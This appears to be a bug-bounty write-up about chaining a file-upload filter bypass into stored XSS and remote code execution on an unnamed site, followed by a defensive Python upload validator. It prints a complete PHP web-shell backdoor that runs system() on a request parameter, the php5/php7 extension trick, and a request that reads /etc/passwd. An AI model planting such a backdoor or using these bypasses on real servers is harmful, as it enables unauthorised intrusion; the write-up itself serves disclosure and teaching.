How I found RCE But Got Duplicated


So first of all, I cannot show you the name of the site because of security issues, but let me tell you how I was able to bypass the file upload functionality to upload a shell to the website.

So first, in the edit profile screen, I was trying to find an XSS, because XSS pays a lot, but sadly I couldn't find any XSS in any of the possible parameters. So I thought: let's upload a shell. For that I checked whether the image was being uploaded to the same app or to some third-party app. All the other images on that website were at https://victimsite.com/images/static/image.jpg, so when I uploaded a simple image to the profile it ended up at https://victimsite.com/images/users/<ProfilID>/smilehacker.jpg


The next thing was to try uploading any other extension, but if I tried uploading any extension other than JPG or PNG it popped up a forbidden error. So it was clear that there were restrictions on other MIME types.

So I thought I needed to look at the GET request that carries the filename & mime: https://victimsite.com/settings/<id>/avatar?name=test.png&mime=image%2Fpng

The response code of that request was 200 OK, simple. The next request was a PUT request that uploads the file to the images directory:

https://victimsite.com/users/<id>/testtts.png

I tried changing the content of the PUT request to HTML or TXT, but it responded with error code 500 [That sucks…]. Later I realized that was because I had forgotten that the Referer header contains the last URL. So I tested it again by changing the name & mime in the first GET request (since that URL was added as the Referer of the next PUT request), and then I changed the content & file type in the PUT request.


AND I GOT 200: https://victimsite.com/settings/<id>/avatar?name=smile.html&mime=text%2Fhtml

Following that request, I changed the PUT request to upload an HTML file, and it succeeded. Now I had a stored XSS via the HTML file; I had bypassed the Same-Origin Policy & the X-Frame-Options header and more……

Then I decided to upload a PHP file with my remote code..


<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

It's a simple PHP backdoor which I found on Google, TBH.. But when I uploaded the PHP code it gave me a 403 status code (felt like, WTF is happening?).

So I thought, let's try some other extensions (I was thinking that would be the last try; after it I'd leave it). And when I tried php5 and php7, it worked like magic. Target: https://victimsite.com/images/users/<id>/try.phps?cmd=cat+/etc/passwd

(MY FIRST RCE)

They fixed this bug after a week, but due to company policy I cannot show you the name.
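For contrast, here is the kind of server-side check that would have stopped this chain. It is an added example, not the site's code or the author's: it allowlists the final extension, requires the declared MIME to match that extension, verifies the body's magic bytes, and stores the file under a random server-chosen name, all within the same request, instead of trusting a name/mime negotiated by an earlier GET and echoed back through the Referer header. The function names and the allowlist table are assumptions made for the example.

```python
import os
import secrets

# Allowlist of final extensions -> (expected MIME, magic-byte prefix).
# Constructed for this example; anything not listed (php, php5, php7, phps,
# html, txt, ...) is rejected no matter what the client declares.
ALLOWED_IMAGE_TYPES = {
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
}


def validate_avatar(filename: str, declared_mime: str, content: bytes) -> str:
    """Validate one upload and return the server-chosen storage name.

    Raises ValueError when the upload must be refused. The name, the mime
    parameter and the body are all checked here, in the same request, so a
    value accepted by an earlier request (or echoed via Referer) grants nothing.
    """
    base = os.path.basename(filename.replace("\\", "/"))  # drop any path part
    if "." not in base:
        raise ValueError("filename has no extension")
    ext = base.rsplit(".", 1)[1].lower()  # the *last* extension decides
    if ext not in ALLOWED_IMAGE_TYPES:
        raise ValueError(f"extension not allowed: .{ext}")
    expected_mime, magic = ALLOWED_IMAGE_TYPES[ext]
    if declared_mime.strip().lower() != expected_mime:
        raise ValueError(f"declared MIME {declared_mime!r} does not match .{ext}")
    if not content.startswith(magic):
        raise ValueError("file body is not a valid " + expected_mime)
    # Persist under a random name: nothing the client sent reaches the path
    # or the URL, so a double extension like shell.php.png is harmless.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename: str, declared_mime: str, content: bytes) -> bool:
    """Convenience wrapper: True if validate_avatar would store the file."""
    try:
        validate_avatar(filename, declared_mime, content)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed PNG header
    print(validate_avatar("smilehacker.png", "image/png", png))
    print(is_accepted("smile.html", "text/html", b"<html></html>"))  # False
```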

THANKS FOR YOUR TIME

Regards,

Smilehacker
